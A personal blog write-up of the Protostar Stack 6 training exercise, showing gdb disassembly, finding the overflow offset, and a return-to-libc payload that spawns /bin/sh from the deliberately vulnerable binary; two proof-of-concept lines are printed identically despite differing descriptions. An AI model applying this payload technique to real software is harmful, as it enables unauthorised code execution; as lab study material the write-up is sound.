NamHB's Blog

Exploit Exercises - Protostar Stack 6

Nam Ha Bach's photo
Nam Ha Bach
·

4 min read

It is free time - I had some time to play exploit-exercises. Today i play at stack level 6. I learned some experience for me, with return to lib.
Use gdb, disassembly:

#gdb -q /opt/protostar/bin/stack6

(gdb) disas main
Dump of assembler code for function main:
0x080484fa

: push %ebp
0x080484fb

: mov %esp,%ebp
0x080484fd

: and $0xfffffff0,%esp
0x08048500

: call 0x8048484
0x08048505

: mov %ebp,%esp
0x08048507

: pop %ebp
0x08048508

: ret
End of assembler dump.

(gdb) disas getpath
Dump of assembler code for function getpath:
0x08048484 : push %ebp
0x08048485 : mov %esp,%ebp
0x08048487 : sub $0x68,%esp
0x0804848a : mov $0x80485d0,%eax
0x0804848f : mov %eax,(%esp)
0x08048492 : call 0x80483c0
0x08048497 : mov 0x8049720,%eax
0x0804849c : mov %eax,(%esp)
0x0804849f : call 0x80483b0
0x080484a4 : lea -0x4c(%ebp),%eax
0x080484a7 : mov %eax,(%esp)
0x080484aa : call 0x8048380
0x080484af : mov 0x4(%ebp),%eax
0x080484b2 : mov %eax,-0xc(%ebp)
0x080484b5 : mov -0xc(%ebp),%eax
0x080484b8 : and $0xbf000000,%eax
0x080484bd : cmp $0xbf000000,%eax
0x080484c2 : jne 0x80484e4
0x080484c4 : mov $0x80485e4,%eax
0x080484c9 : mov -0xc(%ebp),%edx
0x080484cc : mov %edx,0x4(%esp)
0x080484d0 : mov %eax,(%esp)
0x080484d3 : call 0x80483c0
0x080484d8 : movl $0x1,(%esp)
0x080484df : call 0x80483a0 <_exit plt="">
0x080484e4 : mov $0x80485f0,%eax
0x080484e9 : lea -0x4c(%ebp),%edx
0x080484ec : mov %edx,0x4(%esp)
0x080484f0 : mov %eax,(%esp)
0x080484f3 : call 0x80483c0
0x080484f8 : leave
0x080484f9 : ret

Set breakpoint at call getpath and getpath+116, before return to main (overflowed)

(gdb) info breakpoints

Num Type Disp Enb Address What
1 breakpoint keep y 0x08048500 in main at stack6/stack6.c:27
breakpoint already hit 1 time
2 breakpoint keep y 0x080484f8 in getpath at stack6/stack6.c:23
breakpoint already hit 1 time

Generate paypoad, use msftool to get padding, it is 80.

python -c 'print "A"*80+ "BBBB"'

crashed, eip point to 0x42424242, controll eip done!

When review source code, u will see code check return address not in 0xbfxxxxxxx. So to exploit it, u need use return to lib (Many tutorial use rop, i thinks it not need).

p system

p exit

to get function address

this is payload

Set string to parameter os system function: export SHELL2='/bin/sh'. Then get this address of environment and add 7 (len("SHELL2=")=7).

| "A"*80 to fill | system() address | exit() address | /bin/sh address |

use ;cat | stack6 trick to hold shell after open.

This is poc use environment variable: (python -c 'print "A"*80+"\xb0\xff\xec\xb7"+"\xc0\x60\xec\xb7"+"\xc8\xf6\xff\xbf"+"/bin/sh"';cat) | /opt/protostar/bin/stack6

Then, i need use /bin/sh in poc. So i choose put /bin/sh in last of poc

| "A"*80 to fill | system() address | exit() address | /bin/sh address | /bin/sh string |

Use gdb dump, add 0x30 to real memory.

This is poc:

(python -c 'print "A"*80+"\xb0\xff\xec\xb7"+"\xc0\x60\xec\xb7"+"\xc8\xf6\xff\xbf"+"/bin/sh"';cat) | /opt/protostar/bin/stack6

----------------------------------------------------------
Thanks for reading
--------------------------------------------------------------------------
Security Research
SecurityLab - Linux Lab -- Window and Cisco Lab
to be continued - I will update more.

Nam Habach